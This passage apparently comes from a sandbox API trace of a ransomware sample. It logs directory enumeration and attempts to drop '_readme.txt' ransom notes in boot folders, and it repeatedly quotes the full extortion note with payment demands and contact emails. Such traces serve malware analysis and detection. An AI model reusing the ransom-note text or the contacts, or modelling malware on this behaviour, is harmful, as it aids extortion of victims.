key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0180.511] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac5768 [0180.511] CreateFileW (lpFileName="C:\\Boot\\tr-TR\\_readme.txt" (normalized: "c:\\boot\\tr-tr\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0180.512] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac5768 | out: hHeap=0x2c0000) returned 1 [0180.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae1ea0 | out: hHeap=0x2c0000) returned 1 [0180.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.513] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.513] FindFirstFileW (in: lpFileName="C:\\Boot\\tr-TR\\*" (normalized: "c:\\boot\\tr-tr\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0180.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.514] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.514] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0180.514] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0180.514] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0180.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.515] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad75e0 | out: hHeap=0x2c0000) returned 1 [0180.515] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad75e0 [0180.515] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0180.515] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.515] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.515] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.515] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.516] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.516] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.516] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.516] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.516] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.516] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.516] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.517] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.517] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.517] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.517] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.517] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.517] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.517] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.518] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.518] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.518] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.518] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0180.518] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.519] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.519] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.519] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.519] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0180.519] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.519] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0180.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.520] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.520] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.521] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.521] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0180.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.521] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.521] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0180.522] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.522] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.522] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.522] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0180.522] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.523] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.523] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.523] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.524] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.524] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.524] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.524] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0180.525] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.525] PathFindFileNameW (pszPath="C:\\Boot\\zh-CN\\") returned="zh-CN\\" [0180.525] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.525] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0180.525] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0180.525] PathFindFileNameW (pszPath="") returned="" [0180.525] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.525] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759a0000 [0180.526] GetProcAddress (hModule=0x759a0000, lpProcName="SHGetFolderPathW") returned 0x75a25708 [0180.526] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x2ade6e0 [0180.526] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2ade6e0 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0180.526] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x2ac3dd0 [0180.526] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.526] FreeLibrary (hLibModule=0x759a0000) returned 1 [0180.526] PathAppendW (in: pszPath="C:\\Boot\\zh-CN\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\zh-CN\\_readme.txt") returned 1 [0180.526] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.526] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.526] PathFileExistsW (pszPath="C:\\Boot\\zh-CN\\_readme.txt") returned 0 [0180.527] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x2ae1ea0 [0180.527] lstrcpyW (in: lpString1=0x2ae1ea0, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0180.527] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0180.527] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac5768 [0180.527] CreateFileW (lpFileName="C:\\Boot\\zh-CN\\_readme.txt" (normalized: "c:\\boot\\zh-cn\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0180.528] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac5768 | out: hHeap=0x2c0000) returned 1 [0180.529] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae1ea0 | out: hHeap=0x2c0000) returned 1 [0180.529] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.529] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.529] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-CN\\*" (normalized: "c:\\boot\\zh-cn\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0180.530] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.530] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.530] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0180.530] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0180.530] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0180.531] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.531] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad75e0 | out: hHeap=0x2c0000) returned 1 [0180.531] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad75e0 [0180.531] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0180.531] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.531] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.532] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.532] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.532] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.532] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.532] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.533] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.533] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.533] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.533] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.533] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.533] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.533] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.534] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.534] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.534] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.534] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.534] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.535] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.535] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.535] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0180.535] HeapFree (in: hHeap=0x2c0000, 